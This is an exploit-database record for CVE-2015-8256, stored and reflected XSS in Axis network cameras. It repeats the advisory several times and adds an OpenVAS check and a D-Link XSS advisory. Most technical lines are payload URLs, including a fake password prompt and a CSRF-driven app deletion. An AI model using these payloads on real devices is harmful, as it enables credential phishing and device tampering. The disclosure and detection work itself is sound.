ID 1337DAY-ID-24995 Type zdt Reporter Orwelllabs Modified 2016-04-11T00:00:00
Description
Exploit for hardware platform in category web applications
I. ADVISORY INFORMATION
-----------------------
Title: Axis Network Cameras Multiple Cross-site scripting
Vendor: Axis Communications
Class: Improper Input Validation [CWE-20]
CVE Name: CVE-2015-8256
Remotely Exploitable: Yes
Locally Exploitable: No
OLSA-ID: OLSA-2015-8256
Adivisory URL:
http://www.orwelllabs.com/2016/01/axis-network-cameras-multiple-cross.html
II. Background
--------------
Axis is the market leader in network video, invented the world’s first
network camera back in 1996 and we’ve been innovators in video surveillance
ever since. Axis network video products are installed in public places and
areas such as retail chains, airports, trains, motorways, universities,
prisons, casinos and banks.
III. vulnerability
------------------
AXIS Network Cameras are prone to multiple (stored/reflected) cross-site
scripting vulnerability.
IV. technical details
---------------------
These attack vectors allow you to execute an arbitrary javascript code in
the user browser (session) with this steps:
# 1 Attacker injects a javascript payload in the vulnerable page:
http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script
type="text/javascript>prompt("AXIS_PASSWORD:")</script>
This will create a entry in the genneral log file (/var/log/messages) So,
when the user is viewing the log 'system options' -> 'support' -> 'Logs &
Reports':
http://{axishost}/axis-cgi/admin/systemlog.cgi?id
will be displayed a prompt for the password of the current user
('AXIS_PASSWORD').
However, due to CSRF presented is even possible to perform all actions
already presented: create, edit and remove users and applications, etc. For
example, to delete an application "axis_update" via SXSS:
http://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script src="http://
axishost/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml"></script>
* A reflected cross-site scripting affects all models of AXIS devices on
the same parameter:
http://
{axis-cam-model}/view/view.shtml?imagePath=0WLL</script><script>alert('AXIS-XSS')</script><!--
# Other Vectors
http://
{axishost}/admin/config.shtml?group=%3Cscript%3Ealert%281%29%3C/script%3E
http://{axishost}/view/custom_whiteBalance.shtml?imagePath=<img src="xs"
onerror=alert(7) /><!--
http://
{axishost}/admin-bin/editcgi.cgi?file=<script>alert('SmithW')</script>
http://
{axishost}/operator/recipient_test.shtml?protocol=%3Cscript%3Ealert%281%29%3C/script%3E
http://
{axishost}/admin/showReport.shtml?content=alwaysmulti.sdp&pageTitle=axis</title></head><body><pre><script>alert(1)</script>
# SCRIPTPATHS:
{HTMLROOT}/showReport.shtml
{HTMLROOT}/config.shtml
{HTMLROOT}/incl/top_incl.shtml
{HTMLROOT}/incl/popup_header.shtml
{HTMLROOT}/incl/page_header.shtml
{HTMLROOT}/incl/top_incl_popup.shtml
{HTMLROOT}/viewAreas.shtml
{HTMLROOT}/vmd.shtml
{HTMLROOT}/custom_whiteBalance.shtml
{HTMLROOT}/playWindow.shtml
{HTMLROOT}/incl/ptz_incl.shtml
{HTMLROOT}/view.shtml
{HTMLROOT}/streampreview.shtml
And many, many others...
V. Impact
---------
allows to run arbitrary code on a victim's browser and computer if combined
with another flaws in the same devices.
VI. Affected products
---------------------
Multiple Axis Network products.
VII. solution
-------------
It was not provided any solution to the problem.
VIII. Credits
-------------
The vulnerability has been discovered by SmithW from OrwellLabs
IX. Legal Notices
-----------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this
information.
X. Vendor solutions and workarounds
-----------------------------------
There was no response from the vendor.
# 0day.today [2018-01-04] #
{"hash": "6fb8c2776261646ba0bed87ef63f19796d1fd25e965ebb6ccfb006e69a293591", "id": "1337DAY-ID-24995", "lastseen": "2018-01-04T21:04:14", "viewCount": 11, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "8b6ec8bac8d95f9edc24b7371c389562", "key": "cvelist"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "2bebc19b72bd95e98513647d258e7828", "key": "description"}, {"hash": "a3eb45aeca1d657820bd9d2f6b83184f", "key": "href"}, {"hash": "5b7c6fd49f967bd86231503220ad4da6", "key": "modified"}, {"hash": "5b7c6fd49f967bd86231503220ad4da6", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "3d3eb7d324e4968734f8af336be011ea", "key": "reporter"}, {"hash": "5be1c2b52344f36521fc1ad179393b1d", "key": "sourceData"}, {"hash": "43bb2b3545aca9e2995bb1232e2a71f7", "key": "sourceHref"}, {"hash": "ce3521d57565931c1d3cdc10f1877fd1", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "edition": 2, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2018-01-04T21:04:14"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-8256"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141674"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310807676"]}, {"type": "exploitdb", "idList": ["EDB-ID:39683"]}, {"type": "zdt", "idList": ["1337DAY-ID-27335"]}], "modified": "2018-01-04T21:04:14"}, "vulnersScore": 5.7}, "type": "zdt", "sourceHref": "https://0day.today/exploit/24995", "description": "Exploit for hardware platform in category web applications", "title": "Axis Network Cameras - Multiple Vulnerabilities", "history": [{"bulletin": {"hash": "7597590da544a1a36df91ee81da1daebaef832db0cc436ed7862288ee8ea4ec0", "id": "1337DAY-ID-24995", "lastseen": "2016-04-20T01:32:18", "enchantments": {"score": {"value": 1.2, "modified": "2016-04-20T01:32:18"}}, "hashmap": [{"hash": "4f77136c0ff85216b10964233490741b", "key": "sourceHref"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "3842a8fbd6d683b429d6ede6ae4ff41d", "key": "href"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "cfd8af49e13d552655507c654c127a4d", "key": "title"}, {"hash": "2bebc19b72bd95e98513647d258e7828", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "b618915072e090bb3da7aad639ba54a7", "key": "modified"}, {"hash": "bab05830c1048ee58d5530d328e182dd", "key": "reporter"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "32057bd4b695c6441fcee87697d144b9", "key": "sourceData"}, {"hash": "b618915072e090bb3da7aad639ba54a7", "key": "published"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/24995", "description": "Exploit for hardware platform in category web applications", "viewCount": 0, "title": "DLINK DVG\u00adN5402SP Cross-Site Scripting Vulnerabilities", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "DLink Multiple Cross Site Scripting Vulnerabilities\r\nVendor : www.dlink.com\r\nProduct Model: DVG\u00adN5402SP\r\nDiscovered by vesp3r\r\n\r\n\r\nAdvisory Timeline\r\n-----------------\r\n\r\n02/05/2016 - Vendor notified (No response)\r\n\r\nVulnerability\r\n-------------\r\n\r\nReflected Cross Site Scripting\r\n\r\n\r\n1) getpage parameter\r\n\r\nGET /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced1337\"%3balert(1)%2f%2f158&var:page=firewall&var:subpage=URLFilter HTTP/1.1\r\n\r\n2) var:menu parameter\r\n\r\nGET /cgi-bin/webproc?getpage=html/index.html&errorpage=html/main.html&var:language=zh_cn&var:menu=setup1337\"%3balert(1)%2f%2f122&var:page=connected&var:retag=1&var:subpage=- HTTP/1.1\r\n\r\n3) var:page parameter\r\n\r\n/cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=firewall9542\"%3balert(1)%2f%2f198&var:subpage=dmz\r\n\r\n4) var:subpage parameter\r\n\r\n/cgi-bin/webproc?getpage=html/index.html&errorpage=html/main.html&var:language=zh_cn&var:menu=setup&var:page=connected&var:retag=1&var:subpage=\"><script>alert(1)<%2fscript>z376l HTTP/1.1\n\n# 0day.today [2016-04-20] #", "published": "2016-02-24T00:00:00", "references": [], "reporter": "vesp3r", "modified": "2016-02-24T00:00:00", "href": "http://0day.today/exploit/description/24995"}, "lastseen": "2016-04-20T01:32:18", "edition": 1, "differentElements": ["cvss", "cvelist", "published", "reporter", "modified", "sourceHref", "sourceData", "title", "href"]}], "objectVersion": "1.3", "cvelist": ["CVE-2015-8256"], "sourceData": "I. ADVISORY INFORMATION\r\n-----------------------\r\nTitle: Axis Network Cameras Multiple Cross-site scripting\r\nVendor: Axis Communications\r\nClass: Improper Input Validation [CWE-20]\r\nCVE Name: CVE-2015-8256\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nOLSA-ID: OLSA-2015-8256\r\nAdivisory URL:\r\nhttp://www.orwelllabs.com/2016/01/axis-network-cameras-multiple-cross.html\r\n \r\n \r\nII. Background\r\n--------------\r\nAxis is the market leader in network video, invented the world\u2019s first\r\nnetwork camera back in 1996 and we\u2019ve been innovators in video surveillance\r\never since. Axis network video products are installed in public places and\r\nareas such as retail chains, airports, trains, motorways, universities,\r\nprisons, casinos and banks.\r\n \r\nIII. vulnerability\r\n------------------\r\nAXIS Network Cameras are prone to multiple (stored/reflected) cross-site\r\nscripting vulnerability.\r\n \r\nIV. technical details\r\n---------------------\r\nThese attack vectors allow you to execute an arbitrary javascript code in\r\nthe user browser (session) with this steps:\r\n \r\n# 1 Attacker injects a javascript payload in the vulnerable page:\r\nhttp://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script\r\ntype=\"text/javascript>prompt(\"AXIS_PASSWORD:\")</script>\r\n \r\nThis will create a entry in the genneral log file (/var/log/messages) So,\r\nwhen the user is viewing the log 'system options' -> 'support' -> 'Logs &\r\nReports':\r\n \r\nhttp://{axishost}/axis-cgi/admin/systemlog.cgi?id\r\nwill be displayed a prompt for the password of the current user\r\n('AXIS_PASSWORD').\r\n \r\nHowever, due to CSRF presented is even possible to perform all actions\r\nalready presented: create, edit and remove users and applications, etc. For\r\nexample, to delete an application \"axis_update\" via SXSS:\r\n \r\nhttp://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script src=\"http://\r\naxishost/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml\"></script>\r\n \r\n* A reflected cross-site scripting affects all models of AXIS devices on\r\nthe same parameter:\r\nhttp://\r\n{axis-cam-model}/view/view.shtml?imagePath=0WLL</script><script>alert('AXIS-XSS')</script><!--\r\n \r\n# Other Vectors\r\nhttp://\r\n{axishost}/admin/config.shtml?group=%3Cscript%3Ealert%281%29%3C/script%3E\r\n \r\nhttp://{axishost}/view/custom_whiteBalance.shtml?imagePath=<img src=\"xs\"\r\nonerror=alert(7) /><!--\r\nhttp://\r\n{axishost}/admin-bin/editcgi.cgi?file=<script>alert('SmithW')</script>\r\n \r\nhttp://\r\n{axishost}/operator/recipient_test.shtml?protocol=%3Cscript%3Ealert%281%29%3C/script%3E\r\n \r\nhttp://\r\n{axishost}/admin/showReport.shtml?content=alwaysmulti.sdp&pageTitle=axis</title></head><body><pre><script>alert(1)</script>\r\n \r\n# SCRIPTPATHS:\r\n \r\n{HTMLROOT}/showReport.shtml\r\n{HTMLROOT}/config.shtml\r\n{HTMLROOT}/incl/top_incl.shtml\r\n{HTMLROOT}/incl/popup_header.shtml\r\n{HTMLROOT}/incl/page_header.shtml\r\n{HTMLROOT}/incl/top_incl_popup.shtml\r\n{HTMLROOT}/viewAreas.shtml\r\n{HTMLROOT}/vmd.shtml\r\n{HTMLROOT}/custom_whiteBalance.shtml\r\n{HTMLROOT}/playWindow.shtml\r\n{HTMLROOT}/incl/ptz_incl.shtml\r\n{HTMLROOT}/view.shtml\r\n{HTMLROOT}/streampreview.shtml\r\n \r\nAnd many, many others...\r\n \r\nV. Impact\r\n---------\r\nallows to run arbitrary code on a victim's browser and computer if combined\r\nwith another flaws in the same devices.\r\n \r\nVI. Affected products\r\n---------------------\r\nMultiple Axis Network products.\r\n \r\nVII. solution\r\n-------------\r\nIt was not provided any solution to the problem.\r\n \r\nVIII. Credits\r\n-------------\r\nThe vulnerability has been discovered by SmithW from OrwellLabs\r\n \r\nIX. Legal Notices\r\n-----------------\r\nThe information contained within this advisory is supplied \"as-is\" with no\r\nwarranties or guarantees of fitness of use or otherwise. I accept no\r\nresponsibility for any damage caused by the use or misuse of this\r\ninformation.\r\n \r\nX. Vendor solutions and workarounds\r\n-----------------------------------\r\nThere was no response from the vendor.\n\n# 0day.today [2018-01-04] #", "published": "2016-04-11T00:00:00", "references": [], "reporter": "Orwelllabs", "modified": "2016-04-11T00:00:00", "href": "https://0day.today/exploit/description/24995"}
{"cve": [{"lastseen": "2019-05-29T18:14:45", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in Axis network cameras.", "modified": "2017-04-25T00:40:00", "id": "CVE-2015-8256", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8256", "published": "2017-04-17T16:59:00", "title": "CVE-2015-8256", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2017-03-17T01:21:58", "bulletinFamily": "exploit", "description": "", "modified": "2017-03-17T00:00:00", "published": "2017-03-17T00:00:00", "href": "https://packetstormsecurity.com/files/141674/AXIS-Network-Camera-Cross-Site-Scripting.html", "id": "PACKETSTORM:141674", "type": "packetstorm", "title": "AXIS Network Camera Cross Site Scripting", "sourceData": "`I. ADVISORY INFORMATION \n----------------------- \nTitle: Axis Network Cameras Multiple Cross-site scripting \nVendor: Axis Communications \nClass: Improper Input Validation [CWE-20] \nCVE Name: CVE-2015-8256 \nRemotely Exploitable: Yes \nLocally Exploitable: No \nOLSA-ID: OLSA-2015-8256 \n \n \nvulnerability \n------------- \nAXIS Network Cameras are prone to multiple (stored/reflected) cross-site \nscripting vulnerability. \n \ntechnical details \n----------------- \n** STORED XSS \n \n \n# 1 Attacker injects a javascript payload in the vulnerable page (using \nsome social enginner aproach): \n \nhttp://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script \ntype=\"text/javascript>prompt(\"AXIS_PASSWORD:\")</script> \n \nThis will generate an error like this on page: \n \n\" \nError processing XML: Incorrect formatting \nline number 2, column 60: \n<error type = \"No_such_application\" message = \"No application\" '<script \ntype=\"text/javascript>prompt(\"AXIS_PASSWORD:\")</script>' \n----------------------------------------------------------------^ \n\" \n \nand also will create a entry in the genneral log file (/var/log/messages) \nwith the JSPayload: \n \n\" \n<INFO > Apr 11 10:08:45 axis-eac8c03d901 vaconfig.cgi: Could not find \napplication '<script \ntype=\"text/javascript>prompt(\"AXIS_PASSWORD:\")</script>' \n\" \n \nWhen the user is viewing the log 'system options' -> 'support' -> 'Logs & \nReports': \nhttp://{axishost}/axis-cgi/admin/systemlog.cgi?id \n \nthe JSPayload will be interpreted by the browser and the Javascript prompt \nmethod will be executed showing a prompt asking user for the password \n('AXIS_PASSWORD'). \n \n* With this vector an attacker is able to perfome many attacks using \njavascript, for example to hook users browser, capture users cookie, \nperforme pishing attacks etc. \n \nHowever, due to CSRF presented is even possible to perform all actions \nalready presented: create, edit and remove users and applications, etc. For \nexample, to delete an application \"axis_update\" via SXSS: \n \nhttp://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script src=\"http:// \naxishost/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml\"></script> \n \n \nA reflected cross-site scripting affects all models of AXIS devices on the \nsame parameter: \nhttp:// \n{axis-cam-model}/view/view.shtml?imagePath=0WLL</script><script>alert('AXIS-XSS')</script><!-- \n \n# Other Vectors \nhttp:// \n{axishost}/admin/config.shtml?group=%3Cscript%3Ealert%281%29%3C/script%3E \n \nhttp://{axishost}/view/custom_whiteBalance.shtml?imagePath=<img src=\"xs\" \nonerror=alert(7) /><!-- \nhttp://{axishost}/admin-bin/editcgi.cgi?file=<script>alert(1)</script> \n \nhttp:// \n{axishost}/operator/recipient_test.shtml?protocol=%3Cscript%3Ealert%281%29%3C/script%3E \n \nhttp:// \n{axishost}/admin/showReport.shtml?content=alwaysmulti.sdp&pageTitle=axis</title></head><body><pre><script>alert(1)</script> \n \n# SCRIPTPATHS: \n \n{HTMLROOT}/showReport.shtml \n{HTMLROOT}/config.shtml \n{HTMLROOT}/incl/top_incl.shtml \n{HTMLROOT}/incl/popup_header.shtml \n{HTMLROOT}/incl/page_header.shtml \n{HTMLROOT}/incl/top_incl_popup.shtml \n{HTMLROOT}/viewAreas.shtml \n{HTMLROOT}/vmd.shtml \n{HTMLROOT}/custom_whiteBalance.shtml \n{HTMLROOT}/playWindow.shtml \n{HTMLROOT}/incl/ptz_incl.shtml \n{HTMLROOT}/view.shtml \n{HTMLROOT}/streampreview.shtml \n \n \nImpact \n------ \nallows to run arbitrary code on a victim's browser and computer if combined \nwith another flaws in the same devices. \n \nAffected products \n----------------- \nMultiple Axis Network products. \n \nsolution \n-------- \nIt was not provided any solution to the problem. \n \nCredits \n------- \nThe vulnerability has been discovered by SmithW from OrwellLabs \n \nLegal Notices \n----------------- \nThe information contained within this advisory is supplied \"as-is\" with no \nwarranties or guarantees of fitness of use or otherwise. I accept no \nresponsibility for any damage caused by the use or misuse of this \ninformation. \n \n \nAbout Orwelllabs \n++++++++++++++++ \ndoublethinking... \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/141674/OLSA-2015-8256.txt"}], "exploitdb": [{"lastseen": "2016-04-11T20:54:52", "bulletinFamily": "exploit", "description": "Axis Network Cameras - Multiple Vulnerabilities. CVE-2015-8256. Webapps exploit for hardware platform", "modified": "2016-04-11T00:00:00", "published": "2016-04-11T00:00:00", "id": "EDB-ID:39683", "href": "https://www.exploit-db.com/exploits/39683/", "type": "exploitdb", "title": "Axis Network Cameras - Multiple Vulnerabilities", "sourceData": " _ _ _ _\r\n | | | | | |\r\n ___ _ ____ _____| | | | __ _| |__ ___\r\n / _ \\| '__\\ \\ /\\ / / _ \\ | | |/ _` | '_ \\/ __| 6079 Smith W\r\n| (_) | | \\ V V / __/ | | | (_| | |_) \\__ \\ doubleplusungood\r\n \\___/|_| \\_/\\_/ \\___|_|_|_|\\__,_|_.__/|___/ owning some telescreens...\r\n\r\n\r\n Security Adivisory\r\n 2016-04-09\r\n www.orwelllabs.com\r\n twt:@orwelllabs\r\n\r\n\r\n\r\n\r\n\r\nI. ADVISORY INFORMATION\r\n-----------------------\r\nTitle: Axis Network Cameras Multiple Cross-site scripting\r\nVendor: Axis Communications\r\nClass: Improper Input Validation [CWE-20]\r\nCVE Name: CVE-2015-8256\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nOLSA-ID: OLSA-2015-8256\r\nAdivisory URL:\r\nhttp://www.orwelllabs.com/2016/01/axis-network-cameras-multiple-cross.html\r\n\r\n\r\nII. Background\r\n--------------\r\nAxis is the market leader in network video, invented the world\u2019s first\r\nnetwork camera back in 1996 and we\u2019ve been innovators in video surveillance\r\never since. Axis network video products are installed in public places and\r\nareas such as retail chains, airports, trains, motorways, universities,\r\nprisons, casinos and banks.\r\n\r\nIII. vulnerability\r\n------------------\r\nAXIS Network Cameras are prone to multiple (stored/reflected) cross-site\r\nscripting vulnerability.\r\n\r\nIV. technical details\r\n---------------------\r\nThese attack vectors allow you to execute an arbitrary javascript code in\r\nthe user browser (session) with this steps:\r\n\r\n# 1 Attacker injects a javascript payload in the vulnerable page:\r\nhttp://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script\r\ntype=\"text/javascript>prompt(\"AXIS_PASSWORD:\")</script>\r\n\r\nThis will create a entry in the genneral log file (/var/log/messages) So,\r\nwhen the user is viewing the log 'system options' -> 'support' -> 'Logs &\r\nReports':\r\n\r\nhttp://{axishost}/axis-cgi/admin/systemlog.cgi?id\r\nwill be displayed a prompt for the password of the current user\r\n('AXIS_PASSWORD').\r\n\r\nHowever, due to CSRF presented is even possible to perform all actions\r\nalready presented: create, edit and remove users and applications, etc. For\r\nexample, to delete an application \"axis_update\" via SXSS:\r\n\r\nhttp://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script src=\"http://\r\naxishost/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml\"></script>\r\n\r\n* A reflected cross-site scripting affects all models of AXIS devices on\r\nthe same parameter:\r\nhttp://\r\n{axis-cam-model}/view/view.shtml?imagePath=0WLL</script><script>alert('AXIS-XSS')</script><!--\r\n\r\n# Other Vectors\r\nhttp://\r\n{axishost}/admin/config.shtml?group=%3Cscript%3Ealert%281%29%3C/script%3E\r\n\r\nhttp://{axishost}/view/custom_whiteBalance.shtml?imagePath=<img src=\"xs\"\r\nonerror=alert(7) /><!--\r\nhttp://\r\n{axishost}/admin-bin/editcgi.cgi?file=<script>alert('SmithW')</script>\r\n\r\nhttp://\r\n{axishost}/operator/recipient_test.shtml?protocol=%3Cscript%3Ealert%281%29%3C/script%3E\r\n\r\nhttp://\r\n{axishost}/admin/showReport.shtml?content=alwaysmulti.sdp&pageTitle=axis</title></head><body><pre><script>alert(1)</script>\r\n\r\n# SCRIPTPATHS:\r\n\r\n{HTMLROOT}/showReport.shtml\r\n{HTMLROOT}/config.shtml\r\n{HTMLROOT}/incl/top_incl.shtml\r\n{HTMLROOT}/incl/popup_header.shtml\r\n{HTMLROOT}/incl/page_header.shtml\r\n{HTMLROOT}/incl/top_incl_popup.shtml\r\n{HTMLROOT}/viewAreas.shtml\r\n{HTMLROOT}/vmd.shtml\r\n{HTMLROOT}/custom_whiteBalance.shtml\r\n{HTMLROOT}/playWindow.shtml\r\n{HTMLROOT}/incl/ptz_incl.shtml\r\n{HTMLROOT}/view.shtml\r\n{HTMLROOT}/streampreview.shtml\r\n\r\nAnd many, many others...\r\n\r\nV. Impact\r\n---------\r\nallows to run arbitrary code on a victim's browser and computer if combined\r\nwith another flaws in the same devices.\r\n\r\nVI. Affected products\r\n---------------------\r\nMultiple Axis Network products.\r\n\r\nVII. solution\r\n-------------\r\nIt was not provided any solution to the problem.\r\n\r\nVIII. Credits\r\n-------------\r\nThe vulnerability has been discovered by SmithW from OrwellLabs\r\n\r\nIX. Legal Notices\r\n-----------------\r\nThe information contained within this advisory is supplied \"as-is\" with no\r\nwarranties or guarantees of fitness of use or otherwise. I accept no\r\nresponsibility for any damage caused by the use or misuse of this\r\ninformation.\r\n\r\nX. Vendor solutions and workarounds\r\n-----------------------------------\r\nThere was no response from the vendor.\r\n\r\n\r\nAbout Orwelllabs\r\n++++++++++++++++\r\nOrwelllabs is a (doubleplusungood) security research lab interested in embedded\r\ndevice & webapp hacking.\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39683/"}], "openvas": [{"lastseen": "2019-12-06T16:40:31", "bulletinFamily": "scanner", "description": "The host is running Axis Network Cameras and is\n prone to multiple cross-site scripting vulnerabilities.", "modified": "2019-12-04T00:00:00", "published": "2016-04-20T00:00:00", "id": "OPENVAS:1361412562310807676", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807676", "title": "Axis Network Cameras Multiple Cross-site Scripting Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Axis Network Cameras Multiple Cross-site Scripting Vulnerabilities\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807676\");\n script_version(\"2019-12-04T13:23:25+0000\");\n script_cve_id(\"CVE-2015-8256\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-12-04 13:23:25 +0000 (Wed, 04 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-04-20 15:15:28 +0530 (Wed, 20 Apr 2016)\");\n script_name(\"Axis Network Cameras Multiple Cross-site Scripting Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"The host is running Axis Network Cameras and is\n prone to multiple cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP GET request and check\n whether it is possible to write a file into the server.\");\n\n script_tag(name:\"insight\", value:\"The flaws exist due to an improper sanitization\n of 'imagePath' parameter in'view.shtml' script.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to\n run arbitrary code on a victim's browser and computer if combined with another\n flaws in the same devices.\");\n\n script_tag(name:\"affected\", value:\"Multiple Axis Network products.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability.\n Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the\n product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/39683\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"http_version.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\naxis_port = get_http_port(default:80);\n\nreq = http_get(item:\"/view/view.shtml\", port:axis_port);\nres = http_send_recv(port:axis_port, data:req);\n\nif(res && \">Live view - AXIS\" >< res && \"Camera<\" >< res)\n{\n url = '/view/view.shtml?imagePath=0WLL</script><script>alert' +\n '(document.cookie)</script><!--';\n\n if(http_vuln_check(port:axis_port, url:url, check_header:TRUE,\n pattern:\"<script>alert\\(document.cookie\\)</script>\",\n extra_check:make_list(\"Live view - AXIS\", \"camera\")))\n {\n report = report_vuln_url(port:axis_port, url:url);\n security_message(port:axis_port, data:report);\n exit(0);\n }\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "zdt": [{"lastseen": "2018-02-19T21:28:22", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2017-03-17T00:00:00", "published": "2017-03-17T00:00:00", "href": "https://0day.today/exploit/description/27335", "id": "1337DAY-ID-27335", "type": "zdt", "title": "AXIS Network Camera Cross Site Scripting Vulnerability", "sourceData": "I. ADVISORY INFORMATION\r\n-----------------------\r\nTitle: Axis Network Cameras Multiple Cross-site scripting\r\nVendor: Axis Communications\r\nClass: Improper Input Validation [CWE-20]\r\nCVE Name: CVE-2015-8256\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nOLSA-ID: OLSA-2015-8256\r\n\r\n\r\nvulnerability\r\n-------------\r\nAXIS Network Cameras are prone to multiple (stored/reflected) cross-site\r\nscripting vulnerability.\r\n\r\ntechnical details\r\n-----------------\r\n** STORED XSS\r\n\r\n\r\n# 1 Attacker injects a javascript payload in the vulnerable page (using\r\nsome social enginner aproach):\r\n\r\nhttp://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script\r\ntype=\"text/javascript>prompt(\"AXIS_PASSWORD:\")</script>\r\n\r\nThis will generate an error like this on page:\r\n\r\n\"\r\nError processing XML: Incorrect formatting\r\nline number 2, column 60:\r\n<error type = \"No_such_application\" message = \"No application\" '<script\r\ntype=\"text/javascript>prompt(\"AXIS_PASSWORD:\")</script>'\r\n----------------------------------------------------------------^\r\n\"\r\n\r\nand also will create a entry in the genneral log file (/var/log/messages)\r\nwith the JSPayload:\r\n\r\n\"\r\n<INFO > Apr 11 10:08:45 axis-eac8c03d901 vaconfig.cgi: Could not find\r\napplication '<script\r\ntype=\"text/javascript>prompt(\"AXIS_PASSWORD:\")</script>'\r\n\"\r\n\r\nWhen the user is viewing the log 'system options' -> 'support' -> 'Logs &\r\nReports':\r\nhttp://{axishost}/axis-cgi/admin/systemlog.cgi?id\r\n\r\nthe JSPayload will be interpreted by the browser and the Javascript prompt\r\nmethod will be executed showing a prompt asking user for the password\r\n('AXIS_PASSWORD').\r\n\r\n* With this vector an attacker is able to perfome many attacks using\r\njavascript, for example to hook users browser, capture users cookie,\r\nperforme pishing attacks etc.\r\n\r\nHowever, due to CSRF presented is even possible to perform all actions\r\nalready presented: create, edit and remove users and applications, etc. For\r\nexample, to delete an application \"axis_update\" via SXSS:\r\n\r\nhttp://{axishost}/axis-cgi/vaconfig.cgi?action=get&name=<script src=\"http://\r\naxishost/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml\"></script>\r\n\r\n\r\nA reflected cross-site scripting affects all models of AXIS devices on the\r\nsame parameter:\r\nhttp://\r\n{axis-cam-model}/view/view.shtml?imagePath=0WLL</script><script>alert('AXIS-XSS')</script><!--\r\n\r\n# Other 